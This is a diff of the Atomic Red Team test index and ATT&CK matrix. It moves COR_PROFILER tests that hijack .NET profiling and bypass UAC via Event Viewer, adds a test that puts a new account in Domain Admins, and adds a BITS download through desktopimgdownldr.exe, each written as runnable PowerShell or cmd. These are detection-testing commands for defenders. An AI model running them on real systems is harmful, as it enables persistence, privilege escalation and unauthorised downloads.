-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -1538,7 +1538,132 @@ privilege-escalation:
      - Jesse Brown, Red Canary
      x_mitre_platforms:
      - Windows
-    atomic_tests: []
+      identifier: T1574.012
+    atomic_tests:
+    - name: User scope COR_PROFILER
+      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
+      description: |
+        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
+        The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
+        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
+        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
+        the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
+          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
+          START MMC.EXE EVENTVWR.MSC
+        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
+          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
+          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
+          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
+          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
+          -Force -ErrorAction Ignore | Out-Null\n"
+        name: powershell
+    - name: System Scope COR_PROFILER
+      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
+      description: |
+        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
+        The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
+        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating system environment variables" -ForegroundColor Cyan
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+        cleanup_command: |
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
+        name: powershell
+        elevation_required: true
+    - name: Registry-free process scope COR_PROFILER
+      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
+      description: |
+        Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unamanged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          $env:COR_ENABLE_PROFILING = 1
+          $env:COR_PROFILER = '#{clsid_guid}'
+          $env:COR_PROFILER_PATH = '#{file_name}'
+          POWERSHELL -c 'Start-Sleep 1'
+        cleanup_command: |
+          $env:COR_ENABLE_PROFILING = 0
+          $env:COR_PROFILER = ''
+          $env:COR_PROFILER_PATH = ''
+        name: powershell
  T1546.001:
    technique:
      created: '2020-01-24T13:40:47.282Z'
@@ -1777,129 +1902,7 @@ privilege-escalation:
      - Elastic
      x_mitre_platforms:
      - Windows
-      identifier: T1546.015
-    atomic_tests:
-    - name: COM Hijack Leveraging user scope COR_PROFILER
-      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
-      description: |
-        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
-        The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process.
-        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
-        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
-        the notepad process will not execute with high integrity.
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unmanaged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
-          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
-          START MMC.EXE EVENTVWR.MSC
-        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
-          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
-          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
-          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
-          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
-          -Force -ErrorAction Ignore | Out-Null\n"
-        name: powershell
-    - name: COM Hijack Leveraging System Scope COR_PROFILER
-      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
-      description: |
-        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
-        The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
-        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
-        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unmanaged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          Write-Host "Creating system environment variables" -ForegroundColor Cyan
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-        cleanup_command: |
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
-        name: powershell
-        elevation_required: true
-    - name: COM Hijack Leveraging registry-free process scope COR_PROFILER
-      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
-      description: 'Creates process scope environment variables to enable a .NET profiler
-        (COR_PROFILER) without making changes to the registry. The unmanaged profiler
-        DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell.
-
-'
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unamanged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          $env:COR_ENABLE_PROFILING = 1
-          $env:COR_PROFILER = '#{clsid_guid}'
-          $env:COR_PROFILER_PATH = '#{file_name}'
-          POWERSHELL -c 'Start-Sleep 1'
-        cleanup_command: |
-          $env:COR_ENABLE_PROFILING = 0
-          $env:COR_PROFILER = ''
-          $env:COR_PROFILER_PATH = ''
-        name: powershell
+    atomic_tests: []
  T1134.002:
    technique:
      external_references:
@@ -8461,6 +8464,65 @@ persistence:
              }
        name: powershell
        elevation_required: true
+    - name: Domain Account and Group Manipulate
+      auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
+      description: "Create a random atr-nnnnnnnn account and add it to a domain group
+        (by default, Domain Admins). \n\nThe quickest way to run it is against a domain
+        controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,\nyou need
+        to install PS Module ActiveDirectory (in prereqs) and run the script with
+        appropriare AD privileges to \ncreate the user and alter the group. Automatic
+        installation of the dependency requires an elevated session, \nand is unlikely
+        to work with Powershell Core (untested).\n\nIf you consider running this test
+        against a production Active Directory, the good practise is to create a dedicated\nservice
+        account whose delegation is given onto a dedicated OU for user creation and
+        deletion, as well as delegated\nas group manager of the target group.\n\nExample:
+        `Invoke-AtomicTest -Session $session 'T1098' -TestNames \"Domain Account and
+        Group Manipulate\" -InputArgs @{\"group\" = \"DNSAdmins\" }`\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        account_prefix:
+          description: |
+            Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
+            a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful.
+          type: String
+          default: atr-
+        group:
+          description: Name of the group to alter
+          type: String
+          default: Domain Admins
+        create_args:
+          description: Additional string appended to New-ADUser call
+          type: String
+          default: ''
+      dependencies:
+      - description: 'PS Module ActiveDirectory
+
+'
+        prereq_command: "Try {\n    Import-Module ActiveDirectory -ErrorAction Stop
+          | Out-Null\n    exit 0\n} \nCatch {\n    exit 1\n}\n"
+        get_prereq_command: |
+          if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+            Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+          } else {
+            Install-WindowsFeature RSAT-AD-PowerShell
+          }
+      executor:
+        command: |
+          $x = Get-Random -Minimum 2 -Maximum 99
+          $y = Get-Random -Minimum 2 -Maximum 99
+          $z = Get-Random -Minimum 2 -Maximum 99
+          $w = Get-Random -Minimum 2 -Maximum 99
+
+          Import-Module ActiveDirectory
+          $account = "#{account_prefix}-$x$y$z"
+          New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}
+          Add-ADGroupMember "#{group}" $account
+        cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))"
+          | Remove-ADUser -Confirm:$False
+
+'
+        name: powershell
  T1098.003:
    technique:
      external_references:
@@ -9425,6 +9487,41 @@ persistence:
          bitsadmin.exe /complete #{bits_job_name}
        cleanup_command: 'del #{local_file} >nul 2>&1

+'
+        name: command_prompt
+    - name: Bits download using destktopimgdownldr.exe (cmd)
+      auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
+      description: "This test simulates using destopimgdwnldr.exe to download a malicious
+        file\ninstead of a desktop or lockscreen background img. The process that
+        actually makes \nthe TCP connection and creates the file on the disk is a
+        svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe.
+        See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_file:
+          description: Remote file to download
+          type: url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
+        download_path:
+          description: Local file path to save downloaded file
+          type: path
+          default: SYSTEMROOT=C:\Windows\Temp
+        cleanup_path:
+          description: path to delete file as part of cleanup_command
+          type: path
+          default: C:\Windows\Temp\Personalization\LockScreenImage
+        cleanup_file:
+          description: file to remove as part of cleanup_command
+          type: string
+          default: "*.md"
+      executor:
+        command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file}
+          /eventName:desktopimgdownldr
+
+'
+        cleanup_command: 'del #{cleanup_path}\#{cleanup_file}
+
 '
        name: command_prompt
  T1547:
@@ -9831,7 +9928,132 @@ persistence:
      - Jesse Brown, Red Canary
      x_mitre_platforms:
      - Windows
-    atomic_tests: []
+      identifier: T1574.012
+    atomic_tests:
+    - name: User scope COR_PROFILER
+      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
+      description: |
+        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
+        The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
+        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
+        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
+        the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
+          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
+          START MMC.EXE EVENTVWR.MSC
+        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
+          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
+          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
+          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
+          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
+          -Force -ErrorAction Ignore | Out-Null\n"
+        name: powershell
+    - name: System Scope COR_PROFILER
+      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
+      description: |
+        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
+        The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
+        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
